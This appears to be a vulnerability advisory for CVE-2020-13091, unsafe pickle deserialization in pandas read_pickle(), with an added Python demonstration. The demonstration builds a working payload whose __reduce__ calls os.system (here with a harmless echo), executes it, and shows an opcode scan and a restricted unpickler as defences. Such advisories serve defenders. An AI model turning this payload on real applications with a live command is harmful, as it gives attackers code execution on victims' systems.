CVE-2020-13091
Unsafe Deserialization vulnerability in pandas (PyPI)
What is CVE-2020-13091 About?
This disputed vulnerability in pandas through 1.0.3 allows deserialization and command execution from untrusted files passed to the `read_pickle()` function. A pickled object's `__reduce__` method names a callable and its arguments, and the unpickler invokes that callable while reconstructing the object; if it names `os.system`, arbitrary commands run with the privileges of the loading process. The issue is disputed because `read_pickle()` is documented as unsafe for untrusted input, but it remains an easy way for developers to introduce code execution into an application.
Affected Software
pandas (PyPI), versions through 1.0.3
Technical Details
The vulnerability stems from the read_pickle() function in pandas through version 1.0.3. This function deserializes pickled Python objects and, for that purpose, hands the file contents to the standard pickle machinery. The pickle protocol is not a passive data format: when a pickled object defines a __reduce__ method, the stream records the callable and arguments that __reduce__ returned, and the unpickler calls that callable during deserialization to rebuild the object. If the callable is os.system (or any other importable command-execution primitive) and the arguments are attacker-chosen, the command executes as soon as the file is loaded, before the application sees any result. The outcome is arbitrary code execution in the context of the process that called read_pickle(); it is remote only where that file arrives from a remote source.
What is the Impact of CVE-2020-13091?
Successful exploitation allows an attacker who can supply a pickle file to execute arbitrary code with the privileges of the process that loads it, leading to system compromise, data manipulation, or denial of service.
What is the Exploitability of CVE-2020-13091?
Exploitation requires an attacker to be able to supply a malicious pickled file to an application that passes it to pandas' read_pickle() function. Building such a payload is trivial: a class whose __reduce__ returns a tuple of a callable and its arguments, serialized with the standard pickle module, is enough. No authentication is required to trigger the vulnerability, since everything depends on the application's handling of input files. The attack is local if the attacker can place the malicious file on the system, or remote if the application downloads and processes untrusted pickled files. The primary risk factor is the application's use of read_pickle() on untrusted data, despite its documented unsafety.
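To make the mechanism described in the Technical Details and Exploitability sections concrete, the following added example (not code from the pandas project or from this advisory's references) builds the kind of pickle an attacker would hand to read_pickle(), shows that a plain pickle.load, which is what read_pickle() ultimately performs on the bytes, runs the embedded command while reconstructing the object, and demonstrates two defensive checks: a static scan of the opcode stream for the globals it would import, and a restricted unpickler that refuses any global outside an allowlist. The class and function names, the allowlist contents, the benign sample blob and the harmless echo command are assumptions chosen for this demonstration.

```python
import io
import os
import pickle
import pickletools

# --- attacker side ---------------------------------------------------------
# A class whose __reduce__ tells the unpickler to call os.system with an
# attacker-chosen command while "reconstructing" the object. The command used
# here is a harmless echo chosen for this demonstration (assumption).
class MaliciousPayload:
    def __init__(self, command):
        self.command = command

    def __reduce__(self):
        # (callable, args): the unpickler calls callable(*args) at load time.
        return (os.system, (self.command,))


def build_payload(command="echo pickle-deserialization-demo"):
    """Serialise the payload exactly as it would be written to a .pkl file."""
    return pickle.dumps(MaliciousPayload(command))


# Constructed benign input for comparison: a plain dict references no globals.
BENIGN_BLOB = pickle.dumps({"rows": [1, 2, 3]})


# --- victim side -----------------------------------------------------------
def unsafe_load(blob):
    """What pandas.read_pickle() effectively does: pickle.load on the bytes.
    For the payload above this runs os.system(command) and returns its exit
    status instead of a DataFrame; the damage is done before anything is checked."""
    return pickle.load(io.BytesIO(blob))


# --- defensive checks ------------------------------------------------------
def find_globals(blob):
    """Statically list the (module, name) pairs a pickle would import, without
    executing it. Protocol <= 3 emits GLOBAL "module name"; protocol 4+ pushes
    the two strings and then STACK_GLOBAL. Tracking the last two pushed strings
    is a heuristic that matches the standard pickler's output, not a full
    emulation of the pickle stack."""
    found, pushed = [], []
    for opcode, arg, _pos in pickletools.genops(blob):
        if opcode.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            pushed.append(arg)
        elif opcode.name == "STACK_GLOBAL":
            found.append((pushed[-2], pushed[-1]))
    return found


# Allowlist of globals an application is willing to resolve (assumption; a
# real list is specific to the data the application expects to load).
SAFE_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse to resolve any global that is not explicitly allowlisted, so a
    __reduce__ pointing at os.system (or anything else) fails before it is called."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"refusing to import {module}.{name} from an untrusted pickle")


def safe_load(blob):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def is_rejected(blob):
    """True if the restricted unpickler refuses the blob."""
    try:
        safe_load(blob)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    blob = build_payload()
    print("globals the payload would import:", find_globals(blob))    # [('posix', 'system')] on Linux
    print("benign blob imports:", find_globals(BENIGN_BLOB))          # []
    print("restricted unpickler rejects payload:", is_rejected(blob))  # True
    # Deliberately run the unsafe path last: this is the point where
    # read_pickle() on an attacker's file executes the command.
    print("unsafe_load returned exit status:", unsafe_load(blob))
```

For real pandas pickles an allowlist is impractical, because a DataFrame references numpy and pandas internals that would all have to be enumerated, so the practical fix is never to pass untrusted bytes to read_pickle() at all and to exchange data in a non-executable format instead. The opcode scan and the restricted unpickler are still useful for triaging a suspicious .pkl file before anyone loads it.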
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| No known exploits | | |
What are the Available Fixes for CVE-2020-13091?
Available Upgrade Options
- pandas
- <1.0.4 → Upgrade to 1.0.4
Upgrading does not make read_pickle() safe for untrusted input: pickle deserialization invokes arbitrary callables by design, and the pandas documentation linked below continues to warn that only pickles from trusted sources should be loaded. Treat any code path that passes attacker-controlled files to read_pickle() as a code-execution sink regardless of version, and prefer a non-executable format such as CSV or Parquet for data that crosses a trust boundary.
Additional Resources
- https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_pickle.html
- https://osv.dev/vulnerability/PYSEC-2020-73
- https://github.com/0FuzzingQ/vuln/blob/master/pandas%20unserialize.md
What are Similar Vulnerabilities to CVE-2020-13091?
Similar Vulnerabilities: CVE-2019-15820, CVE-2019-17546, CVE-2020-8919, CVE-2020-1749, CVE-2020-7764
